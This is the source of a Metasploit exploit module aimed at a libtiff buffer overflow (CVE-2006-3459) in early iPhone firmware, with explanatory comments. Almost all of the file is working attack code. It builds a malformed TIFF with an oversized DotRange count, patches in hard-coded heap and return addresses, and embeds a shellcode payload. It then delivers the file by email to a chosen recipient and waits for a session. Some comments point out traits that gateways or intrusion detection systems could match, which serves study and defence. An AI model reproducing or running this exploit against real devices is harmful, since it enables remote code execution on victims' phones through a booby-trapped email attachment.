GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/apple_ios/email/mobilemail_libtiff.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  #
  # This module sends email messages via smtp
  #
  include Msf::Exploit::Remote::SMTPDeliver

  # Module metadata.
  #
  # Stance is Passive: the only action taken is sending one e-mail, after
  # which the module waits for a session (see `exploit`). The single target
  # carries two address constants, 'Heap' and 'Magic', that `generate_tiff`
  # patches into the data block of the malformed TIFF. The payload 'Space'
  # of 1800 bytes is what keeps the payload inside the 2048-byte block that
  # `generate_tiff` builds (196 + 1800 < 2048).
  #
  # @param info [Hash] extra module info merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apple iOS MobileMail LibTIFF Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the version of
          libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
          1.1.1 of the Apple iPhone. iPhones which have not had the BSD
          tools installed will need to use a special payload.
        },
        'License' => MSF_LICENSE,
        'Author' => ['hdm', 'kf'],
        'References' => [
          ['CVE', '2006-3459'],
          ['OSVDB', '27723'],
          ['BID', '19283']
        ],
        'Stance' => Msf::Exploit::Stance::Passive,
        'Payload' => {
          'Space' => 1800,
          'BadChars' => '',
          'Compat' => {
            'ConnectionType' => '-bind -find'
          }
        },
        'Arch' => ARCH_ARMLE,
        'Targets' => [
          [
            'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
            {
              'Platform' => 'osx',

              # Scratch space for our shellcode and stack
              'Heap' => 0x00802000,

              # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
              'Magic' => 0x300d562c
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2006-08-01',
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_DOWN ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ UNRELIABLE_SESSION ]
        }
      )
    )
  end

  # Opts this module out of the framework's automatic exploit filtering.
  #
  # @return [false]
  def autofilter
    false
  end

  # Assembles a two-part MIME message (a random base64 text body plus the
  # crafted TIFF as an attachment) and hands it to the SMTPDeliver mixin.
  #
  # Observable properties of the message, from the code below: the subject
  # is random unless SUBJECT is set in the datastore; the attachment name is
  # a random alphabetic string with a .jpg, .tiff or .tif extension; the
  # attachment content always begins with the fixed 132-byte TIFF header
  # described in `generate_tiff`, which is the stable part of this artefact
  # for mail-gateway or IDS matching.
  #
  # @return [void]
  def exploit
    exts = ['jpg', 'tiff', 'tif']

    # NOTE(review): exts.sample is the idiomatic form of this pick
    gext = exts[rand(exts.length)]
    data = Rex::Text.rand_text_alpha(1..32)
    tiff = generate_tiff(target)

    msg = Rex::MIME::Message.new
    msg.mime_defaults
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(1..32)
    # MAILTO / MAILFROM are presumably registered by the SMTPDeliver mixin
    # - they are not declared in this file
    msg.to = datastore['MAILTO']
    msg.from = datastore['MAILFROM']

    msg.add_part(Rex::Text.encode_base64(data, "\r\n"), 'text/plain', 'base64', 'inline')
    msg.add_part_attachment(tiff, rand_text_alpha(1..32) + '.' + gext)

    send_message(msg.to_s)

    # Passive stance: nothing further happens here, a handler picks up the
    # session if the payload ever runs
    print_status('Waiting for a payload session (backgrounding)...')
  end

  # Builds the malformed TIFF file.
  #
  # Layout, as read off the byte strings below:
  #
  # * Bytes 0x00-0x83 (132 bytes): a little-endian TIFF header ("II", 42,
  #   first IFD at 0x1e) holding one IFD of eight 12-byte entries followed
  #   by a zero next-IFD offset. The only non-literal field is the count of
  #   the last entry, and it comes from the constant `lolz`, so this prefix
  #   is byte-identical in every file the module produces.
  # * The last IFD entry is tag 0x0150 (the DotRange tag in the TIFF
  #   specification, which defines it as holding two SHORT values) with type
  #   SHORT, count 2048 and data offset 0x84 - i.e. it points at the block
  #   appended immediately after the header. That oversized count is the
  #   trigger for the overflow the module description refers to.
  # * Bytes 0x84 onward: a 2048-byte block of random bytes with fixed
  #   4-byte little-endian writes at offsets 92, 104, 116, 120 and 192 and
  #   the encoded payload written at offset 196. Every write replaces an
  #   existing slice, so the block length stays 2048 (the value stored at
  #   offset 92) as long as the payload fits, which the 1800-byte 'Space'
  #   in `initialize` guarantees.
  #
  # @param targ [Hash] the selected target; reads targ['Heap'] and targ['Magic']
  # @return [String] the complete file: header followed by the data block
  #   (`tiff << hehe` evaluates to `tiff`)
  def generate_tiff(targ)
    #
    # This is a TIFF file, we have a huge range of evasion
    # capabilities, but for now, we don't use them.
    # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
    #

    # Element count claimed by the tag 0x0150 entry and the size of the
    # data block that follows the header
    lolz = 2048
    # "II" byte order, magic 42, first IFD at offset 0x1e
    tiff = "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"
    tiff << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    # IFD entry count (8), then tag 0x0100
    tiff << "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"
    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"
    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"
    tiff << "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"
    tiff << "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"
    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"
    tiff << "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"
    # Last entry: tag 0x0150, type SHORT (3), ...
    tiff << "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"
    # ... count = lolz (2048) ...
    tiff << [lolz].pack('V')
    # ... data offset 0x84 (= header length), then next-IFD offset 0
    tiff << "\x84\x00\x00\x00\x00\x00\x00\x00"

    # Randomize the bajeezus out of our data
    hehe = rand_text(lolz)

    # Were going to candy mountain!
    hehe[120, 4] = [targ['Magic']].pack('V')

    # >> add r0, r4, #0x30
    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack('V')

    # Candy mountain, Charlie!
    # >> mov r1, sp

    # It will be an adventure!
    # >> mov r2, r8
    # hehe.length is lolz (2048) here
    hehe[92, 4] = [ hehe.length ].pack('V')

    # Its a magic leoplurodon!
    # It has spoken!
    # It has shown us the way!
    # >> bl _memcpy

    # Its just over this bridge, Charlie!
    # This magical bridge!
    # >> ldr r3, [r4, #32]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #32]
    # >> ldr r3, [r4, #36]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #36]
    # >> ldr r3, [r4, #40]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #40]
    # >> ldr r3, [r4, #44]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #44]

    # We made it to candy mountain!
    # Go inside Charlie!
    # sub sp, r7, #0x14
    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack('V')

    # Goodbye Charlie!
    # ;; targ['Heap'] + 0x48 becomes the stack pointer
    # >> ldmia sp!, {r8, r10}

    # Hey, what the...!
    # >> ldmia sp!, {r4, r5, r6, r7, pc}

    # Return back to the copied heap data
    hehe[192, 4] = [ targ['Heap'] + 196 ].pack('V')

    # Insert our actual shellcode at heap location + 196
    # (slice assignment of equal length: 196 + Space (1800) stays below 2048)
    hehe[196, payload.encoded.length] = payload.encoded

    # Header + data block; the << returns tiff, which is the method's value
    tiff << hehe
  end
end